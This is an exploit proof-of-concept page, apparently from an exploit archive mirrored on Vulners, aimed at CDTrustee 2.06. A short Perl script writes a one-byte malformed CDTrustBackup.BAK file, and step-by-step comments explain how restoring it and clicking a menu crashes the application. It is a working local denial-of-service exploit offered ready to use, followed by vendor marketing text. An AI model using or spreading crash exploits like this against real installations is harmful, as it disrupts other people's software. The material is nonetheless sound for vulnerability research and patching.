`# Exploit Title: CDTrustee .BAK Local Crash POC
# Date: March 30, 2010
# Software Link: [http://www.base40.com/cdtDownload.html]
# Version: 2.06
# Tested on: WinXP SP3 and Windows 7
# Cost: 39.95 USD
# Author: chap0
# Email: chap0x90[at]gmail[dot]com
# Site: [http://www.setfreesecurity.com]
#
#
# Usage: Install software, run this script it will create
# CDTrustBackup.BAK, the file must be this name to restore.
# Click File -> Restore Backup File -> Locate CDTrustBackup.BAK
# Click OK -> OK -> OK -> Restore Complete -> OK
# Click on Playlist Menu At Top (Or almost any other Menu -> Sub Menu or button)
# Crash will occur, Thats all for now!
#
# For to be carnally minded is death; but to be spiritually minded is life and peace.
# Rom. 8:6
# Greetz: GOD, TS aka br34dcrumbs, and This Coffee that I'm drinking
# Thanks to the Exploit-DB crew for the inspiration
#
#
#!/usr/bin/perl
print "Creating CDTrustBackup.BAK file\n";
my $bak = "\x41";
my $file = "CDTrustBackup.BAK";
open (FILE, ">$file");
print FILE "$bak";
print "Usage: File -> Restore Backup File -> Locate CDTrustBackup.BAK\n";
print "Click on Playlist Menu\n";
print "BOOM!\n"
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation